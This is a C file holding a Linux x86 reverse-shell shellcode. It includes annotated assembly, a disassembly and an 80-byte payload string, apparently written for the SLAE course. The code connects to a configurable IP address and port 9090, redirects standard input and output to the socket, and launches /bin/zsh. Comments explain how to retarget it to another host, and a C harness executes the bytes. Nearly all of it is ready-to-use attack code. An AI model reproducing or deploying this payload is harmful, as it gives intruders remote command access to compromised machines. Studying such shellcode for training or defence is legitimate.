/* ; ; Linux x86 ; Author: thryb ; Date: 21-07-16 ; Purpose: Reverse /bin/zsh to TCP port 9090 ; Size: 80 bytes ; ID: SLAE-770 ; Git: https://www.github.com/thryb/SLAE-770 ; global _start section .text _start: xor eax, eax ; cleaning registers xor ebx, ebx ; 1 - create socket ; socket(AF_INET, SOCK_STREAM, 0); ; #define SYS_SOCKET 1 // sys_socket(2) push eax ; null terminate push byte 0x1 ; stack = 0, 1 push byte 0x2 ; stack = 0, 1, 2 (0, SOCK_STREAM, AF_INET) mov al, 0x66 ; sys_socketcall = 102 mov bl, 0x1 ; socketcall() socket = 1 mov ecx, esp ; mv stack ptr into ecx int 0x80 ; init xchg esi, eax ; saving sockfd ; 2 - Connect ; connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr)); mov al, 0x66 ; sys_socketcall = 102 add ebx, 0x2 ; sys_connect = 3 push 0xefffff7f ; 127.255.255.254 (ip2shell.py) push word 0x8223 ; 9090 (port2shell.py) push word 0x2 ; 2 AF_INET mov ecx, esp ; mv stack ptr to ecx push 0x10 ; addr leght 16 push ecx ; ptr address push esi ; fd mov ecx, esp ; mv final stack ptr to ecx int 0x80 ; init xchg eax, esi ; save sockfd ; 3 - dup ; sys_dup2 = 63 = 0x3f xor ecx, ecx ; NULL ecx add cl, 0x2 ; add 2 to counter dup2: ; STDIN, STDOUT, STDERR mov al, 0x3f ; sys_dup2 int 0x80 ; init dec cl ; decrement counter jns dup2 ; Jump on No Sign (Positive) ; 4 - execve /bin/zsh ; normal execve shell exec push eax ; null push 0x68737a2f ; hsz/ push 0x6e69622f ; nib/ mov ebx, esp ; mv stack ptr to ebx push eax ; null push ebx ; push ptr addr mov ecx, esp ; mv new stack ptr to ecx mov al, 0xb ; sys_execve (11) int 0x80 ; init ============================================================================================================ No NULL ./reverse-zsh-tcp-9090.bin: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: 31 c0 xor %eax,%eax 8048062: 31 db xor %ebx,%ebx 8048064: 50 push %eax 8048065: 6a 01 push $0x1 8048067: 6a 02 push $0x2 8048069: b0 66 mov $0x66,%al 804806b: b3 01 mov $0x1,%bl 804806d: 89 e1 mov %esp,%ecx 804806f: cd 80 int $0x80 8048071: 96 xchg %eax,%esi 8048072: b0 66 mov $0x66,%al 8048074: 83 c3 02 add $0x2,%ebx 8048077: 68 7f ff ff ef push $0xefffff7f 804807c: 66 68 23 82 pushw $0x8223 8048080: 66 6a 02 pushw $0x2 8048083: 89 e1 mov %esp,%ecx 8048085: 6a 10 push $0x10 8048087: 51 push %ecx 8048088: 56 push %esi 8048089: 89 e1 mov %esp,%ecx 804808b: cd 80 int $0x80 804808d: 96 xchg %eax,%esi 804808e: 31 c9 xor %ecx,%ecx 8048090: 80 c1 02 add $0x2,%cl 08048093 : 8048093: b0 3f mov $0x3f,%al 8048095: cd 80 int $0x80 8048097: fe c9 dec %cl 8048099: 79 f8 jns 8048093 804809b: 50 push %eax 804809c: 68 2f 7a 73 68 push $0x68737a2f 80480a1: 68 2f 62 69 6e push $0x6e69622f 80480a6: 89 e3 mov %esp,%ebx 80480a8: 50 push %eax 80480a9: 53 push %ebx 80480aa: 89 e1 mov %esp,%ecx 80480ac: b0 0b mov $0xb,%al 80480ae: cd 80 int $0x80 */ #include #include unsigned char code[] = \ "\x31\xc0\x31\xdb\x50\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x96\xb0\x66\x83\xc3\x02\x68" // Replace IP here (use ip2shell.py to generate IP). "\x7f\xff\xff\xef" // ***************** "\x66\x68" // Replace port here (use port2shell.py to generate IP). "\x23\x82" // ***************** "\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x96\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }